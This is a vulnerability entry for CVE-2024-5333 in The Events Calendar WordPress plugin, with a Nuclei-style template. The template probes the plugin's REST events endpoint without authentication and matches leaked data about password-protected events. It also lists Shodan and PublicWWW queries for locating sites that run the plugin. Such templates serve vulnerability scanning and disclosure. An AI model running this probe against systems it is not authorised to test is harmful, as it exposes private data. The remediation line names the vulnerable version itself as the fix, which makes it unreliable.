漏洞描述
The Events Calendar WordPress plugin 6.8.2.1 contains missing access checks in the REST API, letting unauthenticated users access information about password protected events, exploit requires no authentication.
CVE-2024-5333: WordPress Events Calendar 6.8.2.1 - Information Disclosure
PoC代码[已公开]
id: CVE-2024-5333
info:
name: WordPress Events Calendar 6.8.2.1 - Information Disclosure
author: DhiyaneshDk
severity: medium
description: |
The Events Calendar WordPress plugin 6.8.2.1 contains missing access checks in the REST API, letting unauthenticated users access information about password protected events, exploit requires no authentication.
impact: |
Unauthenticated users can access sensitive event information, potentially leading to information disclosure.
remediation: |
Update to version 6.8.2.1 or later.
reference:
- https://wpscan.com/vulnerability/764b5a23-8b51-4882-b899-beb54f684984/
- https://nvd.nist.gov/vuln/detail/CVE-2024-5333
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-5333
cwe-id: CWE-639
epss-score: 0.07699
epss-percentile: 0.91736
metadata:
verified: true
max-request: 1
vendor: stellarwp
product: the_events_calendar
framework: wordpress
publicwww-query: "/wp-content/plugins/the-events-calendar/"
shodan-query: html:"/wp-content/plugins/the-events-calendar/"
tags: cve,cve2024,wordpress,wp,wp-plugin,the-events-calendar,disclosure
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/tribe/events/v1/events/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"events":'
- '"rest_url":'
- '"total":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502206135b9e3638349833e678db095ed12b5078464ba8dbef86b8dc4c23ee8d14a6d022100d4078e71e94765bef36f76a49e5d134d0cf8796d7fc5fe3b72381ec70ce52fe4:922c64590222798bb761d5b6d8e72950